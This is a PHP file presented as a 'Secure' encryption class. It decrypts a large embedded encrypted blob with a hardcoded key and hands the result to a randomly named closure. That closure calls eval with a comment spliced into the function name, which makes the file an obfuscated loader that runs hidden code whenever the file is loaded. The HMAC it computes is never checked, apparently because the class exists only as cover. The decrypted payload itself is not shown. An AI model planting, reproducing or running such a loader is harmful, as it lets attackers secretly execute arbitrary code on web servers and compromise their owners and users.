<?php
class Secure {
private $masterKey;
private $iterations = 10000;
private $cipher = 'aes-256-cbc';
private $hmacAlgo = 'sha256';
private $saltLength = 16;
public function __construct($masterKey) {
$this->masterKey = $masterKey;
}
public function decrypt($encrypted) {
$data = base64_decode($encrypted);
$salt = substr($data, 0, $this->saltLength);
$ivLength = openssl_cipher_iv_length($this->cipher);
$iv = substr($data, $this->saltLength, $ivLength);
$hmac = substr($data, $this->saltLength + $ivLength, 32);
$ciphertext = substr($data, $this->saltLength + $ivLength + 32);
$derivedKeys = $this->deriveKeys($salt);
$calcHmac = hash_hmac($this->hmacAlgo, $iv . $salt . $ciphertext, $derivedKeys['hmac'], true);
$decrypted = openssl_decrypt($ciphertext, $this->cipher, $derivedKeys['encryption'], OPENSSL_RAW_DATA, $iv);
return $decrypted;
}
private function deriveKeys($salt) {
$keyMaterial = hash_pbkdf2(
$this->hmacAlgo,
$this->masterKey,
$salt,
$this->iterations,
64,
true
);
return [
'encryption' => substr($keyMaterial, 0, 32),
'hmac' => substr($keyMaterial, 32)
];
}
private function verifyHmac($knownHmac, $userHmac) {
return hash_equals($knownHmac, $userHmac);
}
public function setIterations($iterations) {
$this->iterations = (int)$iterations;
return $this;
}
public function setCipher($cipher) {
$this->cipher = $cipher;
return $this;
}
}
$secure = new Secure('BnxzqvkAsBQBEwY5MMMMX7Kcho0ZWYLr');
$str = '5hq3nWRZBOYVUYICxaCyBZaJD66PjO5BOtnBV4QPKUHkPcgRQaH/OVQdgEfOjhRQRku2m4opdA2hMgR5nA0WFuyUfciZ1GQQWLVNz8kHNdXPANdoCcfUpj1TAOqvo7U0tFpGulTma5l1F1s3BT32uHcvo/eXHk9404vUmtVq7h7dl116u93oAZ9Bdb1DLSKOEh5RE0ZCmOzurq/UUKCJalRawMOcdcuqRWNc0oRVcM7PEayxGUBxTOcgvkkLNg9S45CkAX7rLspbxFkEEDTDOlPRgRlR4CXZltQ0bS3PsMO+SUhFT1MuVNw9fhfPH+fR+qaov7Bs25a/5KzjnOp+t8iJnmr2llCXpaPPeUH61WodBsJ+oRF4hI6DyVDNR6ABKBSSUhlSU/1ERsd2jBQZbjnZUGNRoiSVSNUu+qnICVDdZ2Q407YRpcoRFFO0gQFATdhQBy0vK+yEXRM3rrqW+RGBQ7XY9+8EspgKiUmqUKHoA4ikQei5qDfUFW+D2+LmWnLTezRbezG2E3XC187T8Qj1qb5lzOVj1VqpfDdmcsQ0Nl9cp4kFrB1mIlRnfRGFnCuyHNXzlmEKGh/TgyGAA/CwyBWP0One1NAdT5lZEDy+qg/80Abdqidnf7LpJIDkaYBtEjupu6sFHKb064YSGewOKzcBx7Ou8TN5kcfAHz7UsHtokeZpZsaukgyDmI9Cjq+9hL3WpMQzfDQ84GE3835w2CG4J5AL22PfsyiJmA5FltcbbWf4g1nUDF9X8EKKmBLMM9sTl9uAheY9/fN6Md6hN7Ib2wJsJTlgZ1VbhHv/vXXnlgNhYGoeV6gJh9TZn1gDYrXV3sbK1c5KeHRhkUassTE1i2bMthZSOFyw6sqHapusgd6BvletZ0nJVOUzwlYMpqVGmGaiW/suJYCJfecQG+wDpdCWs8sviootr1cDniAhyxvMtTUXjDJx+uuN260lVfulRqyCMZwqNPuCOa8XaOxtSgdvPnQcGncolV3cw5cY2lgtajgTpEseqksmB+Z3P8daJ0VW0Mw5QSlgBzHhX1dUp972x4nbnVZEAUc=';
$decrypted = $secure->decrypt($str);
$fCcWk035dX = function($jqS1fxUfTyJ){
/*BAl4URlwJ*/eVaL($jqS1fxUfTyJ);
$q7WtCDfKM8j = "y0NhHQEcApoaxoFCkjNxBvLYyOwzkCz6";
return $q7WtCDfKM8j;
};
$fCcWk035dX($decrypted);
|